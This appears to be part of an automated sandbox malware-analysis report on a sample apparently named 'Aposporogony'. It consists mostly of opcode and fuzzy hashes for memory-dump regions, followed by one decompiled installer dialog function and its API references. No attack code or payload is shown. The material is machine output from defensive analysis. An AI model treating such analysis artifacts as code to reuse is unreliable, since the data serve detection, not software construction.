                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 8841556a133b0298cb3db91430940d441e5e9be2aa4aade1d74e32c48327d8a2
                                                                                                                                                                                      • Instruction ID: 0c8210bea8695129507fced3f26d79fb37add1a55c0452b79e23630a9f1c64cf
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8841556a133b0298cb3db91430940d441e5e9be2aa4aade1d74e32c48327d8a2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9751FF87E3F305A9F683B27481517EB2A52CF3B181B528B2B5C337B515B71B4A8B058D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 394c68868139c477366efe9d469e91699f3790a2940252ca00bd8de20a945f59
                                                                                                                                                                                      • Instruction ID: f5928046ed9503f9d32fb580be3a917a07f4d5c3d050cb06ddb67b6bbae3ff8b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 394c68868139c477366efe9d469e91699f3790a2940252ca00bd8de20a945f59
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B41202AE2E31E8DE782F2B945A03FE1567CF17180F414F2B4C331AA01B39A458F810D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: aa5c5a85e87b65f9525ae5b23848c1ddf966e15e280b0605a395b82db666e6ec
                                                                                                                                                                                      • Instruction ID: 0eac625aa1fac173266d2ce7bcb8b48795e782f51d9c159df016dc0495ab50c6
                                                                                                                                                                                      • Opcode Fuzzy Hash: aa5c5a85e87b65f9525ae5b23848c1ddf966e15e280b0605a395b82db666e6ec
                                                                                                                                                                                      • Instruction Fuzzy Hash: D131F22AE1D71A8DE782B2B905A13FE1567CF17190F414F2B8C731AA01A396454B810E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 0d61045a45ee5ba0b854556897b4abd800f5875290da1ea0884206edca346b36
                                                                                                                                                                                      • Instruction ID: 308fb8b62c464f5875ec09d6d1cf5e00bbfaf0cb12fb3cd85c1b19f7442b0b74
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0d61045a45ee5ba0b854556897b4abd800f5875290da1ea0884206edca346b36
                                                                                                                                                                                      • Instruction Fuzzy Hash: B0311129E2E71E89E792F2B945A13FF5567CF17180F414F2B8C331AA01B39A458F811D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 43d6618b98913bd7fad0f9f402611eb3851f2e9b632bd31f75a1db7e0d7936bd
                                                                                                                                                                                      • Instruction ID: cc464d866a391a50d7204a8e9cbaf8ed5337bfccae881d30d2fe567da6498311
                                                                                                                                                                                      • Opcode Fuzzy Hash: 43d6618b98913bd7fad0f9f402611eb3851f2e9b632bd31f75a1db7e0d7936bd
                                                                                                                                                                                      • Instruction Fuzzy Hash: 78511036E2E31A89E783F2B481613EE2566CF231C0F514F2B4C332A611B3AE458F845C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: ee1b59005bb088891d019de5357347c0bb10da7c30dda17736ca618bafb9d772
                                                                                                                                                                                      • Instruction ID: fdc30817e8a7bb83f5832dba1cc9b6e6781bdbe959e1ce7cc311ac20a9e441e2
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee1b59005bb088891d019de5357347c0bb10da7c30dda17736ca618bafb9d772
                                                                                                                                                                                      • Instruction Fuzzy Hash: 30510F8BE2F305A9E683B2B486513EF1992CF37180B518B2B5C337B515B71B4A8B458D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: e0d0b7cd621321961256e5202e2ff427ee1e9b556c88844888af36933533f16f
                                                                                                                                                                                      • Instruction ID: 02aa68c0ebb3ba12c894f517e60b9a5b11cd45b39d1279da4c859731ec030960
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0d0b7cd621321961256e5202e2ff427ee1e9b556c88844888af36933533f16f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 13615938600306CFCF289E3841B43E723576FA6694FDA813FDD469F145DB25888AC706
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: b5c9497cdb5fd19357503363831a007e099ceb32dea180376193f60e3dccdf51
                                                                                                                                                                                      • Instruction ID: 52363b8063aa7f6f5ef4365e1f33939027d2e53df1d0e59abc34dc438a794230
                                                                                                                                                                                      • Opcode Fuzzy Hash: b5c9497cdb5fd19357503363831a007e099ceb32dea180376193f60e3dccdf51
                                                                                                                                                                                      • Instruction Fuzzy Hash: 97711E791043459FEB3A9E788A663D63B72EF23390F8640AACC868B574D3344986CF15
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 870cefdba2daa2dd3f01e9a396da1feb45127d44b9921b1770eb388ae7fb5e1f
                                                                                                                                                                                      • Instruction ID: 70dd7caf35cb98bb414bba81cae8679fc6741525b72a7b9a8b1d2ce26d86b8df
                                                                                                                                                                                      • Opcode Fuzzy Hash: 870cefdba2daa2dd3f01e9a396da1feb45127d44b9921b1770eb388ae7fb5e1f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3B410236E2E31A8DE782F6B981513EE1556CF17180F514F2B8C336BA11B79A458F815C
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 385f49465f63abc15f8c7a6d650233ccb6a2b715b8b819fab785f5ea62253393
                                                                                                                                                                                      • Instruction ID: c1696a63651ebe98e43f1636e8e211310cf247321e019c59853e9aa892c52567
                                                                                                                                                                                      • Opcode Fuzzy Hash: 385f49465f63abc15f8c7a6d650233ccb6a2b715b8b819fab785f5ea62253393
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B41204BE3E30695E283B2B481517EB2962CF2B181F518F2B5C336F515B71B4A8B458D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 00c46bef1ce533913bac96d61d0e3f2f7369a5e7b04774f5a2226d67a6d652df
                                                                                                                                                                                      • Instruction ID: a77114baff7310c24968ff396e70e39b98aa920f61e19bf7382225ffac3c810e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 00c46bef1ce533913bac96d61d0e3f2f7369a5e7b04774f5a2226d67a6d652df
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6941002AE2E31A99E782F2B941613EE1553CF171D0F414F2B8C332BA01B7AA458F815D
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: c0a759cbedc3201940dcbe5bd28baa35dffeacbb77f447775d14c273cd79216d
                                                                                                                                                                                      • Instruction ID: 86dfd4eb2bba3438e7d1ecf6c52fc5357b4c3ef71ee4fe985d7bccd8109c26e9
                                                                                                                                                                                      • Opcode Fuzzy Hash: c0a759cbedc3201940dcbe5bd28baa35dffeacbb77f447775d14c273cd79216d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F51EC3560CB05AFD3866D2499573563356AF52365F3A8DAECEC24B994CB33C8E1C341
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: d7f7c2e10bed3055f6f69611bd669cd68b65d937c7cef3bac12870f416f528fa
                                                                                                                                                                                      • Instruction ID: b60afd68fc967ea10d9e3b9f7819f8a85dd5eb782ceff5b648e56c0654485276
                                                                                                                                                                                      • Opcode Fuzzy Hash: d7f7c2e10bed3055f6f69611bd669cd68b65d937c7cef3bac12870f416f528fa
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8431F22AE1D71A89E782F2B905A13FF1567CF171D0F414F2B8C731AA41A3DA454B811E
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 968be6e6171bb8482f650259ff5574d9b6cdccaa4ef543997cb7eb230da52f93
                                                                                                                                                                                      • Instruction ID: dad5ad6ff4f26dc21ab9ddc4533a02ddae2c7ff1d33d9749eef2def79ac6b1c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 968be6e6171bb8482f650259ff5574d9b6cdccaa4ef543997cb7eb230da52f93
                                                                                                                                                                                      • Instruction Fuzzy Hash: CA31CF25708B5BDFDB249E7D89D47DB2362FF66780F89462ECC598B246D360844A8701
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 4f1b7f11bf664c5e9556967f3da17367c1b36ed553955a9477b89115e9f52b9b
                                                                                                                                                                                      • Instruction ID: be9df6e7f58891a1716f59c6e553143036c5efd1342d2d59196a4e474b5a2ffa
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4f1b7f11bf664c5e9556967f3da17367c1b36ed553955a9477b89115e9f52b9b
                                                                                                                                                                                      • Instruction Fuzzy Hash: E7C092383909428FE245DE19C290FC5B3A2FF20F40FC24890F402CBA91C368ED408A20
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2043095128.0000000003480000.00000040.00001000.00020000.00000000.sdmp, Offset: 03480000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3480000_Aposporogony.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                                                                                                                                      • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                                                                                                                                      • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                      			E0040451E(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
                                                                                                                                                                                      				intOrPtr _v8;
                                                                                                                                                                                      				int _v12;
                                                                                                                                                                                      				void* _v16;
                                                                                                                                                                                      				struct HWND__* _t56;
                                                                                                                                                                                      				intOrPtr _t69;
                                                                                                                                                                                      				signed int _t75;
                                                                                                                                                                                      				signed short* _t76;
                                                                                                                                                                                      				signed short* _t78;
                                                                                                                                                                                      				long _t92;
                                                                                                                                                                                      				int _t103;
                                                                                                                                                                                      				signed int _t110;
                                                                                                                                                                                      				intOrPtr _t113;
                                                                                                                                                                                      				WCHAR* _t114;
                                                                                                                                                                                      				signed int* _t116;
                                                                                                                                                                                      				WCHAR* _t117;
                                                                                                                                                                                      				struct HWND__* _t118;
                                                                                                                                                                                      
                                                                                                                                                                                      				if(_a8 != 0x110) {
                                                                                                                                                                                      					if(_a8 != 0x111) {
                                                                                                                                                                                      						L13:
                                                                                                                                                                                      						if(_a8 != 0x4e) {
                                                                                                                                                                                      							if(_a8 == 0x40b) {
                                                                                                                                                                                      								 *0x4216f4 =  *0x4216f4 + 1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L27:
                                                                                                                                                                                      							_t114 = _a16;
                                                                                                                                                                                      							L28:
                                                                                                                                                                                      							return E004043C6(_a8, _a12, _t114);
                                                                                                                                                                                      						}
                                                                                                                                                                                      						_t56 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                      						_t114 = _a16;
                                                                                                                                                                                      						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                                                                                                                                                      							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                                                                                                                                                      							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                                                                                                                                                      							_v12 = _t103;
                                                                                                                                                                                      							_v16 = _t113;
                                                                                                                                                                                      							_v8 = 0x4281e0;
                                                                                                                                                                                      							if(_t103 - _t113 < 0x800) {
                                                                                                                                                                                      								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                                                                                                                                                      								SetCursor(LoadCursorW(0, 0x7f02));
                                                                                                                                                                                      								_push(1);
                                                                                                                                                                                      								E004047CD(_a4, _v8);
                                                                                                                                                                                      								SetCursor(LoadCursorW(0, 0x7f00));
                                                                                                                                                                                      								_t114 = _a16;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						}
                                                                                                                                                                                      						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                                                                                                                                                      							goto L28;
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                                                                                                                                                      								SendMessageW( *0x42a248, 0x111, 1, 0);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                                                                                                                                                      								SendMessageW( *0x42a248, 0x10, 0, 0);
                                                                                                                                                                                      							}
                                                                                                                                                                                      							return 1;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      					if(_a12 >> 0x10 != 0 ||  *0x4216f4 != 0) {
                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                      					} else {
                                                                                                                                                                                      						_t69 =  *0x422700; // 0x6fcc74
                                                                                                                                                                                      						_t29 = _t69 + 0x14; // 0x6fcc88
                                                                                                                                                                                      						_t116 = _t29;
                                                                                                                                                                                      						if(( *_t116 & 0x00000020) == 0) {
                                                                                                                                                                                      							goto L27;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                                                                                                                                                      						E00404381(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                                                                                                                                                      						E004047A9();
                                                                                                                                                                                      						goto L13;
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t117 = _a16;
                                                                                                                                                                                      				_t75 =  *(_t117 + 0x30);
                                                                                                                                                                                      				if(_t75 < 0) {
                                                                                                                                                                                      					_t75 =  *( *0x42921c - 4 + _t75 * 4);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_t76 =  *0x42a298 + _t75 * 2;
                                                                                                                                                                                      				_t110 =  *_t76 & 0x0000ffff;
                                                                                                                                                                                      				_a8 = _t110;
                                                                                                                                                                                      				_t78 =  &(_t76[1]);
                                                                                                                                                                                      				_a16 = _t78;
                                                                                                                                                                                      				_v16 = _t78;
                                                                                                                                                                                      				_v12 = 0;
                                                                                                                                                                                      				_v8 = E004044CF;
                                                                                                                                                                                      				if(_t110 != 2) {
                                                                                                                                                                                      					_v8 = E00404495;
                                                                                                                                                                                      				}
                                                                                                                                                                                      				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                                                                                                                                                      				_push(0x22);
                                                                                                                                                                                      				E0040435F(_a4);
                                                                                                                                                                                      				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                                                                                                                                                      				_push(0x23);
                                                                                                                                                                                      				E0040435F(_a4);
                                                                                                                                                                                      				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                                                                                                                                                      				E00404381( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                                                                                                                                                      				_t118 = GetDlgItem(_a4, 0x3e8);
                                                                                                                                                                                      				E00404394(_t118);
                                                                                                                                                                                      				SendMessageW(_t118, 0x45b, 1, 0);
                                                                                                                                                                                      				_t92 =  *( *0x42a254 + 0x68);
                                                                                                                                                                                      				if(_t92 < 0) {
                                                                                                                                                                                      					_t92 = GetSysColor( ~_t92);
                                                                                                                                                                                      				}
                                                                                                                                                                                      				SendMessageW(_t118, 0x443, 0, _t92);
                                                                                                                                                                                      				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                                                                                                                                                      				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                                                                                                                                                      				 *0x4216f4 = 0;
                                                                                                                                                                                      				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                                                                                                                                                      				 *0x4216f4 = 0;
                                                                                                                                                                                      				return 0;
                                                                                                                                                                                      			}



















                                                                                                                                                                                      0x00404530
                                                                                                                                                                                      0x0040465d
                                                                                                                                                                                      0x004046ba
                                                                                                                                                                                      0x004046be
                                                                                                                                                                                      0x0040478b
                                                                                                                                                                                      0x0040478d
                                                                                                                                                                                      0x0040478d
                                                                                                                                                                                      0x00404793
                                                                                                                                                                                      0x00404793
                                                                                                                                                                                      0x00404796
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040479d
                                                                                                                                                                                      0x004046cc
                                                                                                                                                                                      0x004046d2
                                                                                                                                                                                      0x004046dc
                                                                                                                                                                                      0x004046e7
                                                                                                                                                                                      0x004046ea
                                                                                                                                                                                      0x004046ed
                                                                                                                                                                                      0x004046f8
                                                                                                                                                                                      0x004046fb
                                                                                                                                                                                      0x00404702
                                                                                                                                                                                      0x0040470f
                                                                                                                                                                                      0x00404720
                                                                                                                                                                                      0x00404726
                                                                                                                                                                                      0x0040472e
                                                                                                                                                                                      0x0040473c
                                                                                                                                                                                      0x00404742
                                                                                                                                                                                      0x00404742
                                                                                                                                                                                      0x00404702
                                                                                                                                                                                      0x0040474c
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404757
                                                                                                                                                                                      0x0040475b
                                                                                                                                                                                      0x0040476b
                                                                                                                                                                                      0x0040476b
                                                                                                                                                                                      0x00404771
                                                                                                                                                                                      0x0040477d
                                                                                                                                                                                      0x0040477d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00404781
                                                                                                                                                                                      0x0040474c
                                                                                                                                                                                      0x00404668
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x0040467a
                                                                                                                                                                                      0x0040467a
                                                                                                                                                                                      0x0040467f
                                                                                                                                                                                      0x0040467f
                                                                                                                                                                                      0x00404685
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004046ae
                                                                                                                                                                                      0x004046b0
                                                                                                                                                                                      0x004046b5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x004046b5
                                                                                                                                                                                      0x00404668
                                                                                                                                                                                      0x00404536
                                                                                                                                                                                      0x00404539
                                                                                                                                                                                      0x0040453e
                                                                                                                                                                                      0x0040454f
                                                                                                                                                                                      0x0040454f
                                                                                                                                                                                      0x00404557
                                                                                                                                                                                      0x0040455a
                                                                                                                                                                                      0x0040455e
                                                                                                                                                                                      0x00404561
                                                                                                                                                                                      0x00404565
                                                                                                                                                                                      0x00404568
                                                                                                                                                                                      0x0040456b
                                                                                                                                                                                      0x0040456e
                                                                                                                                                                                      0x00404575
                                                                                                                                                                                      0x00404577
                                                                                                                                                                                      0x00404577
                                                                                                                                                                                      0x00404581
                                                                                                                                                                                      0x0040458e
                                                                                                                                                                                      0x00404598
                                                                                                                                                                                      0x0040459d
                                                                                                                                                                                      0x004045a0
                                                                                                                                                                                      0x004045a5
                                                                                                                                                                                      0x004045bc
                                                                                                                                                                                      0x004045c3
                                                                                                                                                                                      0x004045d6
                                                                                                                                                                                      0x004045d9
                                                                                                                                                                                      0x004045ed
                                                                                                                                                                                      0x004045f4
                                                                                                                                                                                      0x004045f9
                                                                                                                                                                                      0x004045fe
                                                                                                                                                                                      0x004045fe
                                                                                                                                                                                      0x0040460c
                                                                                                                                                                                      0x0040461a
                                                                                                                                                                                      0x0040462c
                                                                                                                                                                                      0x00404631
                                                                                                                                                                                      0x00404641
                                                                                                                                                                                      0x00404643
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004045D0
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 004045FE
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                                                                                                                                                                      • lstrlenW.KERNEL32(?), ref: 0040461F
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 004046A1
                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004046CC
                                                                                                                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 00404720
                                                                                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 0040473C
                                                                                                                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                                                                                                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.2038348795.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
